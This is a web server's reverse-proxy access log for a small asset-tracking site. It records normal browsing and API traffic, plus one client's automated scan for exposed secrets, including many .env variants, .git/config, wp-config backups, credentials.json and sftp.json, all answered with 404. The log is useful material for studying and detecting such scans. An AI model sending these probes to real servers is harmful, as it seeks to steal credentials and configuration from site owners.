[14/Feb/2026:23:16:40 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:16:40 +0000] - 502 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:18:14 +0000] - - 502 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset-pilot] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:18:14 +0000] - - 502 - GET https asset.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to asset-pilot] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:23:08 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/" [Client 91.231.89.18] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:25:41 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:25:41 +0000] - 304 304 - GET https asset.hanmocnn.co.kr "/static/css/style.css?v=2.0" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:25:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon.ico" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:25:41 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:25:41 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/favicon-32x32.png" [Client 222.117.41.51] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:26:39 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 91.231.89.19] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
[14/Feb/2026:23:30:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 91.196.152.61] [Length 6902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
[14/Feb/2026:23:30:58 +0000] - - 301 - GET http asset.hanmocnn.co.kr "/favicon.ico" [Client 91.196.152.61] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-"
[14/Feb/2026:23:36:54 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 63607] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 2062] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/prices" [Client 222.117.41.51] [Length 939] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/assets" [Client 222.117.41.51] [Length 1166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:36:58 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/alerts/settings" [Client 222.117.41.51] [Length 183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[14/Feb/2026:23:37:00 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/api/stream" [Client 222.117.41.51] [Length 470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://asset.hanmocnn.co.kr/"
[15/Feb/2026:00:01:16 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 3.138.118.91] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0" "-"
[15/Feb/2026:00:05:48 +0000] - - 301 - HEAD http asset.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
[15/Feb/2026:00:18:07 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:08 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 185.177.72.60] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:08 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/static/js/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:08 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:09 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:10 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:11 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:12 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:13 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:14 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:15 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/main.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:16 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/app.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:17 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/constants.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/bundle.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:18 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/index.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/@vite/client" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/__env.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:19 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/vendor.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/stripe.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:20 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/checkout.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:21 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/payment.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:22 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/sw.js.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/config.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:23 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/env.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:24 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vite/manifest.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:25 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/config" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.git/HEAD" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.bak" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:26 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.txt" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:27 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-config.php~" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/wp-content/debug.log" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.dev" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:28 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.staging" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.backup" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.old" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.env.save" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:29 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/credentials.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/.vscode/sftp.json.map" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:30 +0000] - 404 404 - GET https asset.hanmocnn.co.kr "/docker-compose.yml" [Client 185.177.72.60] [Length 22] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 2074] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
[15/Feb/2026:00:18:31 +0000] - - 400 - GET https asset.hanmocnn.co.kr "-" [Client 185.177.72.60] [Length 154] [Gzip -] [Sent-to ] "-" "-"
[15/Feb/2026:00:18:31 +0000] - 200 200 - GET https asset.hanmocnn.co.kr "/static/js/app.js" [Client 185.177.72.60] [Length 17770] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
